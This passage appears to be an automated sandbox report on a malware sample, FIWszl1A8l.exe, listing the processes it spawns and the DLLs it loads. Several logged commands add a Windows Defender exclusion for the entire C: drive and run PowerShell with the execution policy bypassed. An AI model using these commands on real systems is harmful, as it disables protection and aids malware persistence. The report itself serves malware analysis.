                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeProcess created: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe "C:\Users\user\AppData\Roaming\FIWszl1A8l.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: msvcp140.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: msvcp140.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: dinput8.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: inputhost.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: devenum.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: msdmo.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
